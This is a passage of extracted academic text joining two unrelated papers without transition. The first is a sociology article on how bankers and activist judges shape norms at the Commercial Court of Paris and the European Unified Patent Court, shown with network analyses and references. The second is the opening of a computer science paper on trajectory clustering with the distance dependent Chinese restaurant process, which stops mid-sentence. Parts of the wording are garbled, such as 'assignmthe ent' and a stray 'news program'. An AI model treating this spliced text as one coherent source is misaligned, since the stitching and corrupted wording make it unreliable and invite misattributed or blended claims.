questions, reconstitutions of careers, open- ended questions, vignettes, etc.) of actors involved in institutional entrepreneurship (renegotiation of new norms) and the usual difficulties of ‘studying up’. Networks and Institutionalization Connections insna.org | Issues 1&2 | Volume 37 | 13 mension of their work. The first study looks at how the financial industry has captured a judicial institution, the Com- mercial Court of Paris (2000–2005). The second study looks at the currently emerg- ing European Unified Patent Court. Both raise anew Selznick’s (1949) old issues of how to design public institutions in a world of governance (to use today’s vocabulary) where an institution becomes a different thing to different people, and where each stakeholder pushes towards goal drift. Promoting norms at the Commercial Court of Paris (2000–2005) The Commercial Court of Paris is a 450- year-old court specialized in commercial litigation and bankruptcy. It is the first- level judicial institution enforcing, creating and updating business norms. The 1807 French Code de Commerce was written by its President. Heterogeneous, high and in- consistent dimensions of the social status of the judges in this court come from the fact that they are all business persons, of- ten successful executives or entrepreneurs, and at the same time officers of justice with the highest possible probity expected from (sworn-in) civil servants/judicial judges. The institution is truly judicial, and delivers fast, cheap, pragmatic, precedent- based justice using a special ‘practical’ procedure. Judges are not just business people, but also voluntary lay judges (50% with a law degree) who are endorsed by an industry and coopted by their peers. 45% are retired and 55% are still paid by their employers or own their own company (in 2000). The composition of the court is characterised by an over-representation of the financial industry (38% of all judges are bankers and insurers). The building sector, another highly litigious sector, sends in 10% of the judges. There are many examples of how these judges do punch above their weight. One example is provided by the story of how they saved the French banking sector from bankruptcy in the 1990s (Lazega, Mounier, Lemaire, 2017). Another example is the very resili- ence of this institution thanks to its built-in problem of conflicts of interests and insti- tutional capture. This court has a strong formal or- ganization, with a rule that judges rotate each year around its carrousel of 20 cham- bers. We have used the metaphor of the spinning top to model the combination of these organized mobilities (rotation) and emergence of a pecking order in the dy- namics of the advice networks among all these judges (Lazega, Lemercier, Mounier, 2006). High-status inconsistency is obvi- ous and conflicts of interests are institu- tionalized (Lazega & Mounier, 2012), as shown by the composition of the chambers in this court in 2000, illustrated by Figure 1. In this figure, bankers are in pink. Banks are the main creditors in the economy; the very simple fact that so many bankers sit in bankruptcy chambers illustrates the level of institutional capture. Connections Networks and Institutionalization 14 | Volume 37 | Issues 1&2 | insna.org Figure 1: Status inconsistency and conflicts of interests at the Commercial Court of Paris: Composi- tion of Chambers in 2000. Judges-bankers in pink However, the domination of bankers also extends, beyond bankruptcy chambers, to epistemic domination in the other activities of this court. To show this, we measured the advice network among these judges in 2000, 2002 and 2005, as represented in Fi- gure 2. An analysis of this dataset using Snijders and Nowicki’s (1997) stochastic blockmodelling shows that, in these net- works, bankers with a law degree are con- sistently the most central advisors for their peers. Statistical analyses (mentioned above) of the dynamics of this structure confirm how this collegial oligarchy con- trols the court epistemically. Bankruptcy chambers Bankruptcy chamber Chamber of Appeal against decisions made by bankruptcy chambers Networks and Institutionalization Connections insna.org | Issues 1&2 | Volume 37 | 15 Figure 2: How do bankers exercise epistemic control in the court and dominate as multi-status oli- garchs? Cyclical dynamics (centralization-decentralization-recentralization) of status in advice net- works among all judges Red: Super-central core, Green: 1st Semi-periphery, Yellow: 2nd Semi-periphery, Blue: Periphery Wave 1 Wave 2 Wave 3 The three figures visualize the cyclical dynamics (centralization-decentralization-recentralization) of status in the advice network among the judges in the court. Core, semi-peripheries and periphery iden- tified with Snijders & Nowicki’s (1997) stochastic blockmodelling. Source: Lazega, Sapulete & Mou- nier (2011). Connections Networks and Institutionalization 16 | Volume 37 | Issues 1&2 | insna.org The evolution of social and epistemic sta- tus in these cyclical dynamics is indeed characterized by the capacity of this hand- ful of members to keep their epistemic au- thority and maintain their highest centrality scores over time: they surf at the top of a wave of centralization, decentralization and recentralization of the system that was measured in this case. Thus, and importantly from a neo- structural perspective focused on institu- tionalization, the multiple dimensions of status of these specific actors in this sys- tem are high, inconsistent and stable rela- tive to the cyclical dynamics of the system. This capacity creates a competitive ad- vantage in the struggle to define the priori- ty norms in the court. Bankers with a law degree not only exercise epistemic control but also use this control to promote specific norms in the court. We measured normative controver- sies in the court and asked each judge to read jurisprudential cases summarizing these controversies, to use their discretion in judicial decision making, and to discuss them with us in face-to-face interviews. One of the cases concerned ‘predatory prices’ and assessment of punitive damag- es in a case of unfair competition. We found that money does talk in this institu- tionalization process: bankers were spread- ing self-serving norms of non-punitivity for such damages. Snijders’ Siena models (Lazega, Mounier, Snijders and Tubaro, 2012) of increasing super-centrality of bankers with a law degree over time helped us track the expected dynamics, ex- posing the fact that no pure normative ho- mophily was driving this spread of non- punitivity. It was rather reflexive align- ment of the majority of judges on the nor- mative choices of the super-central bankers (multi-status oligarchs) who achieved normative steering of the court by building epistemic authority thanks to their super- centrality combined with predictable rheto- rics of status sacrifice: ‘We [banks] could benefit from the current excess of punitivi- ty, but punitivity in principle is bad for the economy’. Other judges aligned their nor- mative choices with those of these multi- status oligarchs. This institutionalization process is not driven by pure normative choices. It is rather driven by normative choices com- bined with specific relational infrastructur- al dynamics in two processes. Firstly, by a dialectic of overload for the super-central members (who cannot answer all the re- quests for advice) and normative conflicts (Lazega, Sapulete and Mounier, 2011). Secondly, by the carrousel of chambers across which judges are rotated once a year, with many non-random infractions to the rule and a limited time horizon for all, including for the members in the core emerging from the movement. Driven by rotation and induced by delegation and turnover in these advice networks, oscilla- tion (centralization, decentralization, re- centralization) produces a form of rewiring that signals to most judges whose norma- tive choices survive in these normative controversies. This first example confirms the capac- ity of the neo-structural theory to account for this institutionalization. Our second ex- ample also involves judges punching above their weight in institution building. Institutionalization of new norms for the European Unified Patent Court This second case is about institutionaliza- tion of common norms at the emerging Eu- ropean Unified Patent Court that is meant to build a unified intellectual property (IP) regime for all European countries. It is based on the same approach as in the pre- vious example, this time with judges work- ing at the international level to build this judicial institution (scheduled to come into existence in 2018). It starts with a familiar pattern of EU institution building, begin- ning with the failure of European national governments to agree on common solu- tions and to concentrate enough power at the European level to impose such institu- tions (Dehousse, 1999; Thatcher, 2002). Here institutional entrepreneurs are corpo- rate lawyers specialized in patents, repre- Networks and Institutionalization Connections insna.org | Issues 1&2 | Volume 37 | 17 sentatives of a public/private regulator (the European Patent Office, EPO) and activist European judges with high-status incon- sistency (civil servants openly involved in lobbying and political work). The position of these judges can also be characterized by high-status inconsistency because they openly cross the lines of division of pow- ers – thus aggrandizing their role in de- mocracy. This lobbying for the creation of a transnational court to enforce a legal in- strument, the European patent created in 1973, was accompanied by work trying to create a common interpretation (‘harmoni- zation’) of the European patent. Indeed, the normative controver- sies, both substantive and procedural, about the interpretation of this patent con- cern the assessment of the ‘inventive step’ of an invention, the determination of the scope of protection afforded by the patent, the involvement of technical experts, and the use by judges of personal rules consid- ering patents either as exceptions to the rule of copying or as rewards for the inven- tor. These disagreements led to a frag- mented normative space in European IP. An example concerning an anti-depressant drug called Escitalopram is a good illustra- tion. Generic supplier companies have long sought the revocation of a basic patent held by a pharmaceutical company that first synthesized this molecule. A Dutch court in The Hague decided on complete cancel- lation of the product and process claims for lack of an ‘inventive step’. In Germany, the Bundespatentgericht decision was the same. However, a decision of the French Tribunal de Grande Instance in Paris was that the product claims by the pharmaceu- tical company were valid. In the United Kingdom, a first instance court decided to invalidate the product claims, but for a dif- ferent reason (namely insufficiency of dis- closure). The case is still regularly revisit- ed. This fragmentation facilitates forum shopping by multinational companies, and the emergence of ‘zombie’ patents. Prodded and assembled by the cor- porate lawyers and by EPO, activist Euro- pean IP judges started to network and con- vene at the so-called Venice Forum, a field-configuring event, to lobby for the construction of this European court and work together on harmonizing their inter- pretations by hammering out a ‘European Compromise’. Where governments failed, a small collegial oligarchy of super-central judges emerges from these events and is poised to create the new European IP re- gime. This collegial oligarchy of judges is perceived by their peers as primi inter pares who should sit on the future Court of Appeal of the UPC and make decisions that will create a common jurisprudence. Three different networks of European judges were measured at the Venice Fo- rum: the network of national and foreign peers (present at the Venice Forum) with whom judges personally discussed patent issues; the network of national and foreign peers whose decisions they read; and the network of national and foreign peers whose decisions they had actually cited at least once in their own decisions. Figures 3.1 to 3.4 identify the most central high- status inconsistency Venice Forum judges assembled in a ‘conclave’9, or collegial ol- igarchy that was both central in the three networks of transnational social exchanges observed among these judges at the Venice Forum, and in a fourth network of judges considered to be representatives of the fu- ture uniform position about patents in Eu- rope (henceforth called ‘uniform net- work’). Note that the reference network (respondent i cites explicitly – in his/her own decisions – decisions made by foreign judges j) is the sparsest network because explicit reference to work of foreign judges is forbidden in some countries (for exam- ple France), but it remains the main net- work in terms of influence. 9 This word was used by lawyers and judges themselves. For example: ‘On a personal level, cohabitation – almost in a conclave – allowed us to get to know and appreciate each other (…) Patent judges from the main European intellectual property countries confronted their points of view, sometimes very frankly, but always with courtesy’. Connections Networks and Institutionalization 18 | Volume 37 | Issues 1&2 | insna.org Figures 3.1–3.3: The Venice Forum collegial oligarchy: Three different networks of European judges measured at the Venice Forum Figure 3.1: Reading network Figure 3.2: Discussion network Figure 3.3: Reference network Networks and Institutionalization Connections insna.org | Issues 1&2 | Volume 37 | 19 Figure 3.4: Uniform network. Judges perceived by their peers as closest to a future uniform European position (the future ‘European Compromise’, if any) *: Super-central judges. Source: Lazega (2012) Multi-status oligarchs, i.e. super- central UK, German, Dutch judges, domi- nate this heterogeneous set of 38 Venice Forum judges. Losers are French, Southern and Central European judges. Super-centrality in the uniform network is explained at 99% by centrality in the three other networks, by member- ship in a block of countries sharing the same kind of capitalism, and by judges’ use of experts in the legal procedure (a dis- criminant feature separating the UK from the Continent at the time). Analysis of the judges’ positions in the controversy com- bined with their positions in the networks shows a slightly chaotic situation: personal ties between judges across borders do not lead (automatically) to convergence and ‘harmonization’. At the time (2009), judg- es actually disagreed on several key issues with the peers that they had selected as the future representatives of the Unified Euro- pean position. These super-central judges at the core of the network, the future rule makers according to their peers, also did not agree with each other (yet). This analy- sis of the Venice Forum relational infra- structure identified the judges who later came up with the 2016 Rules of Procedure of the UPC, a compromise based on rhetor- ical/possible ‘sacrifices’ of distinctive pro- cedural features of each big country’s na- tional ‘legal culture’: orality and adversari- al procedures by the UK; saisie- contrefaçon by France; and bifurcation by German judges. Lazega, Quintane and Casenaz (2016) provide ERGM analyses of the emergence of this uniform network and identify the costs for each of the Ven- ice Forum judges in terms of alignment upon the kind of judge whom they have se- lected in this uniform network. Based on future ‘forced’ normative alignments, win- ners of the institutionalization process are Germany and the UK, losers are Southern and Central Europe. Here again, this case confirms the capacity of the neo-structural theory of institutional entrepreneurship outlined above to account for the construc- tion of this institution. Conclusion To sum up, people are not equal in their capacity to defend their regulatory inter- ests: some punch above their weight by bringing together structure and culture to shape collective agency, process by pro- cess, particularly regulatory and institu- tionalization processes in political work. Connections Networks and Institutionalization 20 | Volume 37 | Issues 1&2 | insna.org Neo-structural institutionalism (Lazega, 2001, 2012a, 2016) shows how helpful it is to identify specific relational infrastruc- tures in socially organized settings to help model processes of regulation and institu- tionalisation of norms and practices. Insti- tutionalization is characterised by specific social dynamics of oligarchical negotiation of ‘precarious values’ (Selznick, 1957) and stabilization in interpretation of the rules en vigueur. In these dynamics, institutional entrepreneurs with heterogeneous and in- consistent forms of social status (measured also in network terms) can have a particu- lar influence in promoting their regulatory interests: when defining priority rules; when using a rhetoric of relative sacrifice to build legitimacy and manage the losers; when articulating and synchronizing regu- lation levels as vertical linchpins. High- status inconsistency is indeed the main characteristic of relational infrastructures mobilized in institutionalization of contro- versial norms. The added value of taking into account the real complexities of high- status inconsistencies was illustrated in two different cases. Analogies between the two cases are not superficial: the same concepts (relational infrastructure, status heterogeneity and inconsistencies, conflicts of interests, multi-status oligarchs, collegi- al oligarchy, rhetorics of building legitima- cy and credibility) and measurements prove useful in accounting for institution- alization. In the neo-structural model of the regulatory process, and in politics in gen- eral, individuals do not just represent themselves. Here they represent organiza- tions, professions, their country, their type of capitalism, or even legal cultures10. This means that the process is necessarily a multi-level one, with superimposed forms of collective agency, justifying the scien- tific work at the level of granularity pre- 10 Legal cultures could be considered to be a level of collective agency if they are defined as dramaturgies, i.e. as involving a text, a scenario, players, roles, strategies, skills and all the ingredients of a play. sented here. For example, judges and coun- tries represent different levels. Within- country relations between judges as nodes differ essentially from between-country re- lations between judges, which is distinct from between-country relations, where countries are the nodes. What is therefore needed in further exploration of this insti- tutionalization process is a combined dy- namic and multi-level perspective (Snijders, 2016, 2017). Indeed, neo- structural institutionalism requires new and richer kinds of data structures, modelling the emergence of an institution using more powerful stochastic actor-oriented models for dynamic multi-level networks, and per- haps new measures. For example, since these dynamics are multi-level, synchroni- zation11 issues between levels also emerge in institutionalization. Related to synchro- nization and its costs, since institutionali- zation is so oligarchical and driven by closed and collegial elites, how should the widening democratic deficit that comes at- tached to the process, and that has been criticised in the public debate over the last few years – especially in relation with the public/private dimension of such institu- tions – be questioned? Such questions show that it is necessary, for a better un- derstanding of the relation between struc- ture and process, to articulate a neo- structural institutionalism (that exploits the critical potential of network analyses of dynamic multi-level systems of interde- pendences) with the political and cultural institutionalisms that prevail in sociology today. In that respect, much remains to be done. 11 Synchronization refers here to the construc- tion of intermediary-level relational infras- tructures where actors combine temporali- ties of collective action taking place above and below their intermediary-level, and try to behave in a way compatible with their own interpretations of norms coming from both upper and lower levels (Lazega, 2016c). Networks and Institutionalization Connections insna.org | Issues 1&2 | Volume 37 | 21 References Bathelt, H. & Glückler, J. (2014). Institutional change in economic geography. Progress in Human Ge- ography, 38(3), 340-63. Christopoulos, D. & Ingold, K. (2015). Exceptional or just well connected? Political entrepreneurs and brokers in policy making. European Political Sci- ence Review, 7(3), 475-498. Dehousse, R. (1999). L'Europe par le droit, Critique internationale, 2,133-50. DiMaggio, P. (1988). Interest and agency in institu- tional theory. In: L. Zucker (ed.), Institutional pat- terns and culture. Cambridge, MA: Ballinger Pub- lishing Company, 3-22. Favereau, O. & Lazega, E. (eds.) (2002). Conventions and Structures in Economic Organization: Mar- kets, Networks, and Hierarchies. Cheltenham: Edward Elgar Publishing. Glückler, J., Suddaby, R. & Lenz, R. (eds.) (2018). Knowledge and Institutions. Heidelberg: Springer. Hall, P.A. & Taylor, R. (1996). Political science and the three new institutionalisms. Political studies, 44, 936-57. Hoffman, A. J. (1999). Institutional evolution and change: Environmentalism and the US chemical industry. Academy of Management Journal, 42, 351-71. Huault, I. & Richard, Ch. (eds.) (2012). Finance: The Discreet Regulator. How Financial Activities Shape and Transform the World, London: Pal- grave-Macmillan. Hughes, E. C. (1945). Dilemmas and contradictions of status. American Journal of Sociology, 50, 353-59. Lahille E. (2015). Le politique dans la Théorie de la Régulation: Bilan et Perspective, Colloque La Théorie de la Régulation à l’épreuve des crises, Paris, 9-12 juin 2015, Université Paris-Diderot- Inalco. Lawrence, T. B., Suddaby, R. & Leca, B. (2011). In- stitutional Work: Refocusing Institutional Studies of Organization, Journal of Management Inquiry 20(1): 52-58. Lazega, E. (2001). The Collegial Phenomenon, Ox- ford: Oxford University Press. Lazega, E. (2003). Networks in legal organizations: On the protection of public interest in joint regula- tion of markets, Oratie for Wiarda Chair, Wiarda Institute Publications, Faculty of Law, Utrecht University. Lazega, E. (2006). Capital social, processus sociaux et capacité d’action collective, in A.Bevort and M.Lallement (eds.), Capital social: Echanges, ré- ciprocité, équité, Paris, La Découverte, 213-25. Lazega, E. (2012a). Sociologie néo-structurale. In: R.Keucheyan et G.Bronner (eds.), Introduction à la théorie sociale contemporaine. Paris: Presses Universitaires de France. Lazega, E. (2012b). Time to Shrink to Greatness? Networks and Conflicts of Interests in Large Pro- fessional Firms, Revue für postheroisches Man- agement, 10, 68-77. Lazega, E. (2012c). Learning from lobbying: Mapping judicial dialogue across national borders among European intellectual property judges. Utrecht Law Review, http://www.utrechtlawreview.org, 8(2) (May) 2012. Lazega, E. (2016a). Réseaux et régulation: Pour un in- stitutionnalisme néo-structural, Revue de la Régu- lation : Capitalisme, institutions, pouvoirs, https://regulation.revues.org/11902#text Lazega, E. (2016b). Joint ‘anormative’ regulation from status inconsistency: A multilevel spinning top model of specialized institutionalization, in Margaret S. Archer (ed.), Anormative Regulation in the Morphogenic Society, Springer, 169-90, Lazega, E. (2016c). Synchronization costs in the or- ganizational society: Intermediary relational infra- structures in the dynamics of multilevel networks, in E.Lazega and T.A.B. Snijders (eds.), Multilevel Network Analysis for the Social Sciences, Spring- er, 47-77. Lazega, E., Mounier, L. & Lemaire, S. (2017). Finan- cial pragmatism and bankers’ politics: The duality of the “Zombies” debate in bankruptcy proceed- ings at the Commercial Court of Paris (2000- 2005). In: V.Boussart (ed.), Finance at Work, London: Routledge. Lazega, E. & Mounier, L. (2012). Networks of institu- tional capture. In: B.Vedres & M.Scotti (eds.), Networks in Social Policy Problems. Cambridge: Cambridge University Press, 124-37. Lazega, E., Lemercier, C. & Mounier L. (2006). A spinning top model of formal structure and infor- mal behaviour: Dynamics of advice networks in a commercial court. European Management Review, 3, 113-22. Lazega, E., Sapulete, S. & Mounier, L. (2011). Struc- tural stability regardless of membership turnover? The added value of blockmodelling in the analysis of network evolution. Quality & Quantity, 45, 129-44. Lazega, E., Mounier, L., Snijders, T.A.B. & Tubaro, P. (2012). Norms, status and the dynamics of ad- vice networks. Social Networks, 34, 323-32. Lazega, E., Quintane, E. & Casenaz, S. (2016). Colle- gial Oligarchy and Networks of Normative Alignments in Transnational Institution Building: The Case of the European Unified Patent Court. Social Networks, 48, 10-22. Lenski, G. E. (1954). Status crystallization: a non- vertical dimension of social status. American Soci- ological Review, 19(4), 405-13. Owen-Smith, J. & Powell, W.W. (2008). Networks and Institutions, in Greenwood, R., Oliver, C., Sahlin-Andersson, K. & Suddaby, R. (eds.). The Sage Handbook of Organizational Institutional- ism, 596-623, London: Sage. Connections Networks and Institutionalization 22 | Volume 37 | Issues 1&2 | insna.org Perrow, Ch. (1991). A society of organizations. Theo- ry and Society, 20, 725-62. Scott, W. R. (2007). Institutions and organizations. Thousand Oaks: Sage. Schultz, J. & Breiger, R. L. (2010). The strength of weak culture. Poetics, 38(6), 610-624. Selznick, P. (1949). TVA and the grass roots: A study in the sociology of formal organization, 3, Berke- ley: University of California Press. Selznick, Ph. (1957). Leadership in Administration. Evanston, Ill.: Row, Peterson & Co. Snijders, T. A., & Nowicki, K. (1997). Estimation and prediction for stochastic blockmodels for graphs with latent block structure. Journal of classifica- tion, 14(1), 75-100. Snijders, T.A.B. (2016). The multiple flavours of mul- tilevel issues for networks, in Lazega, E. and Snijders, T.A.B. (eds.), Multilevel network analy- sis for the social sciences. Springer International Publishing, 15-46. Snijders, T.A.B. (2017). Stochastic Actor-Oriented Models for Network Dynamics. Annual Review of Statistics and Its Application, 4, 343-63. Thatcher, M. (2002). Analysing regulatory reform in Europe. Journal of European Public Policy, 9(6), 859-72. work_latiqsmi2fdrrd6ije6kneur64 ---- Submitted 30 May 2018 Accepted 24 June 2019 Published 12 August 2019 Corresponding authors Reza Arfa, rezaarfa@gmail.com Rubiyah Yusof, rubiyah.kl@utm.my Academic editor Pablo Arbelaez Additional Information and Declarations can be found on page 12 DOI 10.7717/peerj-cs.206 Copyright 2019 Arfa et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Novel trajectory clustering method based on distance dependent Chinese restaurant process Reza Arfa1,2, Rubiyah Yusof1,2 and Parvaneh Shabanzadeh1,2 1 Centre for Artificial Intelligence and Robotics, Universiti Teknologi Malaysia, Kuala Lumpur, Malaysia 2 Centre for Artificial Intelligence and Robotics, Malaysia-Japan International Institute of Technology (MJIIT), Universiti Teknologi Malaysia, Kuala Lumpur, Malaysia ABSTRACT Trajectory clustering and path modelling are two core tasks in intelligent transport systems with a wide range of applications, from modeling drivers’ behavior to traffic monitoring of road intersections. Traditional trajectory analysis considers them as separate tasks, where the system first clusters the trajectories into a known number of clusters and then the path taken in each cluster is modelled. However, such a hierarchy does not allow the knowledge of the path model to be used to improve the performance of trajectory clustering. Based on the distance dependent Chinese restaurant process (DDCRP), a trajectory analysis system that simultaneously performs trajectory clustering and path modelling was proposed. Unlike most traditional approaches where the number of clusters should be known, the proposed method decides the number of clusters automatically. The proposed algorithm was tested on two publicly available trajectory datasets, and the experimental results recorded better performance and considerable improvement in both datasets for the task of trajectory clustering compared to traditional approaches. The study proved that the proposed method is an appropriate candidate to be used for trajectory clustering and path modelling. Subjects Artificial Intelligence, Computer Vision, Visual Analytics Keywords Path modelling, Trajectory clustering, Anomaly detection, Chinese restaurant process, Distance dependent CRP INTRODUCTION The trajectory of a moving object obtained by tracking the object’s position from one frame to the next is a simple yet efficient descriptor of an object’s motion. Trajectory analysis has long been a research focus in different fields of study (Jonsen, Myers & Flemming, 2003; Pao et al., 2012; Reed et al., 1999; Fox, Sudderth & Willsky, 2007). In the context of intelligent surveillance systems (ITS) (Tian et al., 2017), trajectory clustering is a critical core technology in many surveillance applications including activity analysis (Morris & Trivedi, 2011), path modelling (Zhang, Lu & Li, 2009), anomaly detection (Dee & Velastin, 2008), and road intersection traffic monitoring (Aköz & Karsligil, 2014). Many trajectory analysis systems consist of two main steps. In the first step, trajectories are grouped into clusters based on their similarities. Most proposed methods assume the number of clusters to be known. After the trajectories are clustered, the path taken by agents How to cite this article Arfa R, Yusof R, Shabanzadeh P. 2019. Novel trajectory clustering method based on distance dependent Chinese restaurant process. PeerJ Comput. Sci. 5:e206 http://doi.org/10.7717/peerj-cs.206 mailto:rezaarfa@gmail.com mailto:rubiyah.kl@utm.my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.206 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.206 in each cluster will be modelled. There are at least two limitations with these approaches. First, in real-world problems, the number of clusters is usually unknown or is expensive to acquire. Furthermore, trajectory clusters and path models are closely related, whereby the knowledge of one helps in improving the performance of the other. Most existing trajectory analysis methods can be categorized into similarity-based models and Probabilistic Topic Models (PTM). The main stages of similarity-based approaches are calculating a similarity matrix and clustering the trajectories based on the similarity matrix. At the first stage, pairwise similarities between trajectories are obtained via a similarity function and stored into a N ×N matrix, where N is the total number of available trajectories. Defining a suitable similarity measure is a challenging task that directly affects the overall accuracy of the system (Zhang, Kaiqi & Tieniu, 2006). Well-known similarity measures used for trajectory analysis include Euclidean distance, dynamic time wrapping (DTW) (Keogh & Pazzani, 2000), Hausdorff distance (Atev, Miller & Papanikolopoulos, 2010), and Longest Common Sub-Sequences (LCSS) (Vlachos, Kollios & Gunopulos, 2002). After the similarity matrix is obtained, the second stage uses any standard clustering algorithm to cluster the trajectories into K clusters based on their similarities. Typical clustering algorithms include spectral clustering (Ng, Jordan & Weiss, 2002), agglomerative clustering (Xi, Weiming & Wei, 2006), and fuzzy c-means (Weiming et al., 2006). The main disadvantage of similarity-based approaches is that it requires the number of clusters, K , to be known in advance. When trajectories are clustered, some studies perform path modelling in a further stage. Path models are useful in intelligent surveillance systems and used for compact representation of clusters, performing real-time anomaly detection (Morris & Trivedi, 2011), and high-level scene understanding (Lei et al., 2014), and route planning (Joseph et al., 2011). Makris & Ellis (2005) modelled the path as an envelope, which denotes the extent of a path by finding the two farthest samples in a cluster. Morris & Trivedi (2011) used the weighted average of trajectories of each cluster to form the path model for that cluster. Based on the dominant set clustering approach, Yiwen et al. (2014) proposed a system that obtains the scene structure from clustered trajectories. All these approaches, however, model the path after the trajectories are clustered. Therefore, the performance of the modelled path is limited to how well trajectories are clustered. Also, the modelled path is not used to improve the trajectory clustering. Another well-known class of approaches in trajectory analysis is based on probabilistic topic model (PTM) (Papadopoulos, 2008). In PTM approaches, trajectories are first converted into a set of symbols via a pre-defined codebook. This new representation of trajectories is then treated as documents while the symbols are treated as words. Compared to a similarity-based approach, trajectory analysis methods based on PTM do not usually require the number of clusters in advance. Jeong, Chang & Choi (2011) used latent Dirichlet allocation (LDA) and the hidden Markov model (HMM) to discover the semantic regions and the temporal relationship between them. A two-level LDA topic model is proposed by Song et al. (Lei et al., 2014). The first level LDA models the motion of single-agent as distributions over patch-based Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 2/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.206 features. The second level LDA uses the output of the first-level to learn interactions over multi-agents. This model, however, does not perform trajectory clustering. Wang et al. (2011) proposed a dual hierarchical Dirichlet process (Dual-HDP). Unlike previous PTM models, Dual-HDP is capable of clustering the trajectories and modelling the semantic scene at the same time. Each semantic region is modelled as a distribution over grids, and the scene is modelled as a distribution over the semantic regions. The number of clusters and the semantic scene is decided automatically. Since the model relies only on bag-of-grids representation, it cannot capture the long-term dependency between observations. This results in having a partial path model for each cluster. Having a full path model is an important step for interpreting agents’ movement in scenarios such as highways and junctions. Furthermore, since only quantised trajectories are used, the overall performance of Dual-HDP is highly sensitive to grid size. Choosing a large grid size rapidly decreases the performance due to quantisation error. On the other hand, choosing a small grid size requires considerably more amount of data to learn the trajectory patterns. This study proposed a trajectory clustering and path modelling system that clusters the trajectories and models the path taken by each cluster at the same time. Our approach is based on distant dependent Chinese restaurant process (DDCRP) (Blei & Frazier, 2011), which is a generalisation of the normal Chinese restaurant process (CRP) (Pitman, 2002). METHODS Distance dependence chinese restaurant process The Chinese restaurant process (CRP) is a distribution on partitions of integers proposed by Pitman (2002). CRP can be explained by the following analogy: Imagine a Chinese restaurant with an infinite number of tables. The first customer enters the restaurant and sits at the first table with probability1. Next, customers enter the restaurant and sit at occupied tables with probability proportional to the number of customers sitting on that table or sit at an empty table with the probability relative to a parameter α. After this process, which is known as a customer-table assignment, customers sitting on the same table will share a similar dish. This process can be described as follows: P(zi=k|z−i,α)∝ { nk,k≤K α,k=K +1 (1) where zi denotes table assignment for the ith customer, K is the total number of occupied tables, and z−i is table assignmthe ent of all other customers except ith customer, and nk is the total number of customers sitting on the ith table. More details of CRP and its connection to Dirichlet process can be found in Gershman & Blei (2012). The distance dependence Chinese restaurant process (DDCRP) generalises the CRP and allows for a non-exchangeable distribution over partitions (Blei & Frazier, 2011). Unlike CRP, where each customer is assigned to a table, in DDCRP each customer is assigned to another customer with a probability relative to their distance/similarity. Therefore, the more similar two customers, the more probable they will get a direct link. It is important to Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 3/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.206 note that it is still possible for two customers with small similarities to be indirectly linked to each other via intermediate customers. After this procedure, which is also known as a customer to customer assignment, customers who are directly or indirectly linked will sit down at a table and share a similar dish. More formally, let dij represent the distance between ith and jth customers. Probability of customer i have a direct link with customer j is calculated as: P ( ci= j|D,f ,τ ) ∝ { τ, if i= j f (dij), otherwise (2) where f (d) denotes a monolithically decreasing decaying function that satisfies f (∞)=0, D is the matrix of pairwise distance between customers, and τ is a constant that indicates the probability of self-link. The DDCRP was proposed originally for modelling non-exchangeable text documents where the distance between the dates of documents determines their similarity. The documents are converted into their bag-of-words (BoW) representation before the posterior probability of DDCRP is calculated. Such a conversion to BoW representation is a crucial step that makes the inference of DDCRP computationally tractable. Recently researchers have adopted DDCRP for problems beyond language processing. Ghosh et al. (2011) proposed a hierarchical extension of DDCRP for producing coarser image segmentations in the form of human-like segmentations. In a more recent study, Baldassano, Beck & Li (2015) used DDCRP to model a complex web of connections with a small number of interacting units. The proposed method is used to model the connectivity between sub-regions of the human brain and analysing human migration behaviour. Also, Ren et al. (2016) used DDCRP for key frame selection from unordered image sets, where the selected frames are used for dense 3D reconstruction. Trajectory analysis with distance dependent CRP Unlike text data where observations in documents are words sampled from a corpus with a limited number of words, observations in trajectories are not discrete. Trajectories are vectors with varying length where each observation gets a real value bounded by the scene’s size. One can divide the scene into blocks of equal sizes and convert a trajectory into its discrete form. After such a conversion, the resulting quantized trajectories are equal length vectors and each observation gets a discrete value. The size of grids in this case, however, will have a direct impact on the system performance. While theoretically smaller grids can improve the performance, they require substantially more data for training. Another disadvantage of treating trajectories as documents is the bag-of-words representation. Such representation discards the order between observations. Discarding the orders between samples in trajectory data is problematic since it is possible for agents from opposite directions to share the same observations over grids. One solution to avoid this problem is to quantise the direction of observations (Wang et al., 2011). Estimating the direction of observation requires further processing and sometimes includes an inaccurate estimation. Such a quantisation increases the size of the corpus and, therefore, requires more data for training. In addition, with bag-of-word representation alone long-term Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 4/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.206 dependencies between observation cannot be captured which results in having partial path models in existing PTM approaches. We addressed these problems by using similarity between trajectories as the prior probability in DDCRP. Using such a prior probability limits the assignment of trajectories and promotes trajectories to get linked based on how similar two trajectories are. In addition to the similarity measure, whether the trajectories are linked together or not, also will depend on their discrete observation over the grids. Since most similarity measures can be applied prior to converting the trajectory into discrete form, such a formulation is less sensitive to the choice of grid size. In addition, since some similarity measures, including Modified Hausdorff and LCSS, also take the order of the observations into account, it is not required to quantise the direction anymore. Any raw trajectory Ti, is usually represented by a sequence of its ni observation Ti =[oi,1,...,oi,l,...,oi,ni]. In this representation, oi,l indicates lth observed position of ith object. Let dij to indicate pairwise distance between ith and jth trajectories. This distance can be of any general distance used to measure similarity between trajectories. The result of pairwise distance between N trajectories can be stored in a distance matrix and denoted as D∈<N×N . Apart from the calculation of distance matrix discussed above, raw trajectories are converted into bag-of-grids representation. For this, the scene is divided into M grid cells of equal size. Based on the cell in which it falls into each observation of a trajectory oi,l, is individually quantised. Then a raw trajectory, Ti, is approaximated by bag-of-grid represetnation Xi∈<M . Each element of Xi(s) indicates the number of times ith trajectory had an observation in the sth grid cell. Using DDCRP’s metaphor, we use the bag-of-grid representation of trajectories as customers, clusters as the tables and path models as dishes. Based on the definition of DDCRP, it is not possible to draw the table directly. Instead, the outgoing link for each customer needs to be drawn. Trajectories that directly or indirectly link together are considered to be in the same cluster. All trajectories in the similar cluster share the same path model which is a multinomial distribution over the grid cells. Each path model is independently drawn from a base distribution G0. In our case, G0 is a Dirichlet distribution. The full generative process for the news program is as 